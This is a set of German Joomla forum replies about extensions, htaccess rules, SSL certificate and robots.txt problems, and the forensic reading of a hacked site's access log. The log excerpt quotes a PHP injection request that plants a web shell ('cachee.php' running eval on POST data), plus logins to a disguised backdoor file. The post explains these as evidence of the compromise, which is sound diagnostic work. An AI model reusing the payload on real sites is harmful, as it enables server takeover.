Beiträge von flow

    Auch wenn das Thema vom TE für gelöst erklärt wurde: SobiPro könnte die Anforderungen, auch in der kostenlosen Version, problemlos und imho leichter als Seblod lösen.


    Eigene Felder können erstellt, und, falls gewünscht, mit vorher festgelegten Werten belegt werden, nach denen dann in der Suche gefiltert werden kann. Beiträge können von allen Nutzern erstellt, mit Bildern versehen, und dann von einem Admin abgesegnet werden.

    Ich habe bereits die Erweiterung "AllVideos" installiert, habe aber Probleme damit, da ich kein FTP nutze.


    Was für Probleme meinst du?


    Eigentlich ist »AllVideos« sehr einfach zu bedienen: 1. Installieren, 2. Aktivieren (und Parameter einstellen), 3. Tag an gewünschter Stelle einfügen, z.B.: {youtube}Wfint096C2w{/youtube}.

    ich habe es mal so versucht:
    RewriteCond %{THE_REQUEST} ^.*/index\.php
    RewriteRule ^(.*)index.php$ /$1 [R=301,L]


    Diese Regel, die dafür sorgt, dass index.php aus dem URL verschwindet, wird in der Joomla-Standard-Htaccess mitgeliefert (in der Joomla! core SEF Section deiner htaccess). Ich würde vorschlagen, dass du deinen Versuch löscht oder auskommentierst, und dann schaust, ob die mitgelieferte Regel das gewünschte Ergebnis bringt.

    62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5B1%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"


    Lädt via Datei »cachee.php« weitere Dateien nach, in diesem Fall vermutlich u.a. eine Benutzerverwaltung, die über die neu hinzugefügte, getarnte Datei »mod_articles_tags.php« läuft.


    35.166.247.183 - - [03/Jan/2017:18:53:42 +0100] "POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 404 1572 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"


    Versuch, eine Schwachstelle in einem anderen CMS auszunutzen.


    107.151.137.246 - - [07/Jan/2017:02:59:38 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 16 "http://www.xxxx.de/modules/mod_articles_tags/mod_articles_tags.php?login=uxgax" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)"
    192.200.212.204 - - [07/Jan/2017:03:58:50 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 12 "-" "-"


    Anmeldungen in der »neuen« Benutzerverwaltung.


    Der
    Hack ist ganz schön im web.log zu sehen:


    Das ist nur ein Teil. Offensichtlich werden jetzt weitere Dateien per »cachee.php« nachgeladen, und, wie von @flotte bereits angemerkt, automatisiert weitere Schwachstellen gesucht. Die Frage ist aber, wie und wann die Datei »cachee.php« in deinen Webspace gekommen ist.

    Ja, das mit der Verschlüsselung ist auch komisch... Ich nutze Let's Encrypt und die Seite hat ansonsten keine Probleme. Nur iwie Google aktuell (gestern war die adresse noch sicher...)


    Dein Zertifikat ist gültig für »repronik.de«, ohne »www«, während die Passwortzurücksetzen-Seite über »www.repronik.de« ausgeliefert wird.


    @flow
    Ich habe dazu eine Anleitung gelesen, das "Disallow: /components/" sollte es doch tun..., oder nicht?


    http://repronik.de/robots.txt


    Du hast ein »S« zuviel: der Pfad »components« ist nicht erlaubt, »component«, wie im URL der Resetseite, aber schon.